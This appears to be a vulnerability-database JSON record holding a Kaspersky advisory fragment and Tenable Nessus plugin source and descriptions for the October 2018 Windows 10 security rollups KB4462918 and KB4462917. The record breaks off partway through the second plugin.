\n[CVE-2018-8484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8484>)7.8Critical \n[CVE-2018-8427](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8427>)4.7Critical \n[CVE-2018-8489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8489>)8.4Critical \n[CVE-2018-8497](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8497>)0.0Critical\n\n### *KB list*:\n[4462917](<http://support.microsoft.com/kb/4462917>) \n[4463097](<http://support.microsoft.com/kb/4463097>) \n[4462918](<http://support.microsoft.com/kb/4462918>) \n[4462923](<http://support.microsoft.com/kb/4462923>) \n[4462931](<http://support.microsoft.com/kb/4462931>) \n[4462919](<http://support.microsoft.com/kb/4462919>) \n[4464330](<http://support.microsoft.com/kb/4464330>) \n[4462929](<http://support.microsoft.com/kb/4462929>) \n[4462937](<http://support.microsoft.com/kb/4462937>) \n[4462922](<http://support.microsoft.com/kb/4462922>) \n[4462915](<http://support.microsoft.com/kb/4462915>) \n[4462926](<http://support.microsoft.com/kb/4462926>) \n[4462941](<http://support.microsoft.com/kb/4462941>) \n[4463104](<http://support.microsoft.com/kb/4463104>)\n\n### *Microsoft official advisories*:", "modified": "2019-03-07T00:00:00", "published": "2018-10-09T00:00:00", "id": "KLA11333", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11333", "title": "\r KLA11333Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4462918.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8509)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Information Disclosure vulnerability exists in the\n way that Microsoft Windows Codecs Library handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. Exploitation of the\n vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2018-8506)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2018-8512)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462918.NASL", "href": "https://www.tenable.com/plugins/nessus/117998", "published": "2018-10-09T00:00:00", "title": "KB4462918: Windows 10 Version 1709 and Windows Server Version 1709 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117998);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8320\",\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8490\",\n \"CVE-2018-8491\",\n \"CVE-2018-8492\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\",\n \"CVE-2018-8495\",\n \"CVE-2018-8497\",\n \"CVE-2018-8503\",\n \"CVE-2018-8505\",\n \"CVE-2018-8506\",\n \"CVE-2018-8509\",\n \"CVE-2018-8512\",\n \"CVE-2018-8530\"\n );\n script_bugtraq_id(105477, 105478);\n script_xref(name:\"MSKB\", value:\"4462918\");\n script_xref(name:\"MSFT\", value:\"MS18-4462918\");\n\n script_name(english:\"KB4462918: Windows 10 Version 1709 and Windows Server Version 1709 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462918.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8509)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Information Disclosure vulnerability exists in the\n way that Microsoft Windows Codecs Library handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. Exploitation of the\n vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2018-8506)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2018-8512)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)\");\n # https://support.microsoft.com/en-us/help/4462918/windows-10-update-kb4462918\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cb51c9ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4462918.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462918');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462918])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4462917.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462917.NASL", "href": "https://www.tenable.com/plugins/nessus/117997", "published": "2018-10-09T00:00:00", "title": "KB4462917: Windows 10 Version 1607 and Windows Server 2016 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117997);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8320\",\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8490\",\n \"CVE-2018-8491\",\n \"CVE-2018-8492\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\",\n \"CVE-2018-8495\",\n \"CVE-2018-8497\",\n \"CVE-2018-8503\",\n \"CVE-2018-8505\"\n );\n script_bugtraq_id(105477, 105478);\n script_xref(name:\"MSKB\", value:\"4462917\");\n script_xref(name:\"MSFT\", value:\"MS18-4462917\");\n\n script_name(english:\"KB4462917: Windows 10 Version 1607 and Windows Server 2016 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462917.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\");\n # https://support.microsoft.com/en-us/help/4462917/windows-10-update-kb4462917\n 